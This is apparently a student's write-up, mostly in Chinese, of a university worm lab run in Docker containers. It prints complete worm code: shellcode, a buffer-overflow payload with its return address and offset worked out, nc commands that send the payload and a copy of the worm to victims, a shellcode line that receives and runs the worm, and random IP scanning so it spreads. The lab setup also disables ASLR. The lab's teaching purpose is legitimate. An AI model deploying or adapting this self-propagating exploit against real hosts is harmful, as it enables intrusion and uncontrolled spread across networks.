Task 1: Get Familiar with the Lab Setup
在nano目录和map目录分别运行docker-compose build && docker-compose up
建立实验环境
中途产生报错,反复运行,直至成功
Task 2: Attack the First Target
首先执行以下指令
sudo /sbin/sysctl -w kernel.randomize_va_space=0
我们在Labsetup/worm文件夹中提供了一个框架代码。我们将逐步完成这段代码,每项任务一次做一件事。在这个任务中,我们主要完成createBadfile()函数,该函数为缓冲区溢出攻击生成恶意负载。我们将对第一个目标发动攻击。我们可以选择任何宿主作为第一目标。在代码中,我们硬编码了目标10.151.0.71(➀行)。学生们可以随意更改。在后面的任务中,我们将生成目标IP地址,而不是硬编码IP地址
4.1 The Skeleton Code
#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint
# You can use this shellcode to run any command you want
shellcode= (
"\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
"\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
"\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
"\xff\xff\xff"
"AAAABBBBCCCCDDDD"
"/bin/bash*"
"-c*"
# You can put your commands in the following three lines.
# Separating the commands using semicolons.
# Make sure you don't change the length of each line.
# The * in the 3rd line will be replaced by a binary zero.
" echo '(^_^) Shellcode is running (^_^)'; "
" ping -q 1.2.3.4; "
" *"
"123456789012345678901234567890123456789012345678901234567890"
# The last line (above) serves as a ruler, it is not used
).encode('latin-1')
# Create the badfile (the malicious payload)
def createBadfile():
content = bytearray(0x90 for i in range(500))
##################################################################
# Put the shellcode at the end
content[500-len(shellcode):] = shellcode
ret = 0xffffd608 # Need to change
offset = 116 # Need to change
content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
##################################################################
# Save the binary code to file
with open('badfile', 'wb') as f:
f.write(content)
# Find the next victim (return an IP address).
# Check to make sure that the target is alive.
def getNextTarget():
return '10.151.0.71'
###############################################################
print("The worm has arrived on this host ^_^", flush=True)
# This is for visualization. It sends an ICMP echo message to
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)
# Create the badfile
createBadfile()
# Launch the attack on other servers
while True:
targetIP = getNextTarget()
# Send the malicious payload to the target host
print(f"**********************************", flush=True)
print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
print(f"**********************************", flush=True)
subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)
# Give the shellcode some time to run on the target host
time.sleep(1)
# Sleep for 10 seconds before attacking another host
time.sleep(10)
# Remove this line if you want to continue attacking others
exit(0)
4.2 Creating the badfifile
在任意容器或host上执行
echo hello | nc -w2 10.151.0.71 9090
在dcup界面可以看到信息反馈(降低了缓冲区溢出利用的难度)
ret = 0xffffd608 # Need to change
offset = 116 # Need to change
ret=(ebp) +16
offset=ebp - bufferaddress +4 =116
4.3 The Shellcode
在任意容器发送badfile
cat badfile | nc 10.151.0.71 9090
可以看到已经成功执行恶意代码
可使用以下代码重启容器
docker restart <container ID>
Task 3: Self Duplication
shellcode负责使目标机器开启8080端口接收文件
" echo '(^_^) Shellcode is running (^_^)'; "
" nc -nvl 8080 > /tmp/worm.py "
" *"
"123456789012345678901234567890123456789012345678901234567890"
负责将worm发送至目标机器,完成worm文件的传输
while Ture:
# Give the shellcode some time to run on the target host
time.sleep(1)
#将worm文件发送至目标机器,完成复制
subprocess.run([f"cat worm.py | nc -w3 {targetIP} 8080"], shell=True)
# Sleep for 10 seconds before attacking another host
time.sleep(10)
可以发现文件传输成功
Task 4: Propagation
根据老师上课的课件
def getNextTarget():
while True:
x = randint(151, 155)
y = randint(70, 80)
ip = f'10.{x}.0.{y}'
output = subprocess.check_output(f"ping -q -c1 -W1 {ip}",shell=True)
result = output.find(b'1 received')
if result == -1 :
print(f"{ip} is not alive", flush = True)
else:
print(f"{ip} is alive,attack start", flush =True)
return ip
完善蠕虫程序后,演示
执行报错
subprocess.CalledProcessError: Command 'ping -q -c1 -W1 10.151.0.76' returned non-zero exit status 1.
使用try except规避掉程序停止
由于ping的时间不一致导致不在同一时刻闪烁,不过可以看到进程数达到了450,比正常的200多了200多,证明每台docker上都在运行着worm.py
Task 5: Preventing Self Infection
为防止一台机器上重复出现感染,我采用的是创建exist文件表示已运行过该程序的方式
在程序之前加入代码
if os.path.exists("/tmp/exist.txt"):
print("exist")
sys.exit(0)
else:
with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
print(f)
此时进程数趋于稳定,意味着没有重复程序运行
Task 6: Releasing the Worm on the Mini Internet
dcbuild
./z_start.sh
将环境起好
#!/bin/env python3
import sys
import os
import time
import subprocess
from random import randint
# You can use this shellcode to run any command you want
shellcode= (
"\xeb\x2c\x59\x31\xc0\x88\x41\x19\x88\x41\x1c\x31\xd2\xb2\xd0\x88"
"\x04\x11\x8d\x59\x10\x89\x19\x8d\x41\x1a\x89\x41\x04\x8d\x41\x1d"
"\x89\x41\x08\x31\xc0\x89\x41\x0c\x31\xd2\xb0\x0b\xcd\x80\xe8\xcf"
"\xff\xff\xff"
"AAAABBBBCCCCDDDD"
"/bin/bash*"
"-c*"
# You can put your commands in the following three lines.
# Separating the commands using semicolons.
# Make sure you don't change the length of each line.
# The * in the 3rd line will be replaced by a binary zero.
" echo '(^_^) Shellcode is running (^_^)'; "
" nc -nvl 8080 > /tmp/worm.py; "
" python3 /tmp/worm.py *"
"123456789012345678901234567890123456789012345678901234567890"
# The last line (above) serves as a ruler, it is not used
).encode('latin-1')
if os.path.exists("/tmp/exist.txt"):
print("exist")
sys.exit(0)
else:
with open("/tmp/exist.txt", 'w', encoding='utf-8') as f:
print(f)
# Create the badfile (the malicious payload)
def createBadfile():
content = bytearray(0x90 for i in range(500))
##################################################################
# Put the shellcode at the end
content[500-len(shellcode):] = shellcode
ret = 0xffffd608 # Need to change
offset = 116 # Need to change
content[offset:offset + 4] = (ret).to_bytes(4,byteorder='little')
##################################################################
# Save the binary code to file
with open('badfile', 'wb') as f:
f.write(content)
# Find the next victim (return an IP address).
# Check to make sure that the target is alive.
def getNextTarget():
while True:
x = randint(151, 180)
y = randint(70, 100)
ip = f'10.{x}.0.{y}'
try:
output = subprocess.check_output(f"ping -q -c1 -W1 {ip}", shell=True)
result = output.find(b'1 received')
if result == -1 :
print(f"{ip} is not alive", flush = True)
else:
print(f"{ip} is alive,attack start", flush =True)
return ip
except subprocess.CalledProcessError as e:
print(e)
###############################################################
print("The worm has arrived on this host ^_^", flush=True)
# This is for visualization. It sends an ICMP echo message to
# a non-existing machine every 2 seconds.
subprocess.Popen(["ping -q -i2 1.2.3.4"], shell=True)
# Create the badfile
createBadfile()
# Launch the attack on other servers
while True:
targetIP = getNextTarget()
# Send the malicious payload to the target host
print(f"**********************************", flush=True)
print(f">>>>> Attacking {targetIP} <<<<<", flush=True)
print(f"**********************************", flush=True)
subprocess.run([f"cat badfile | nc -w3 {targetIP} 9090"], shell=True)
# Give the shellcode some time to run on the target host
time.sleep(1)
#将worm文件发送至目标机器,完成复制
subprocess.run([f"cat worm.py | nc -w5 {targetIP} 8080"], shell=True)
# Sleep for 10 seconds before attacking another host
time.sleep(10)
# Remove this line if you want to continue attacking others
内存只有2G,所以运行中途就卡住了。qaq
不过程序肯定是没问题的!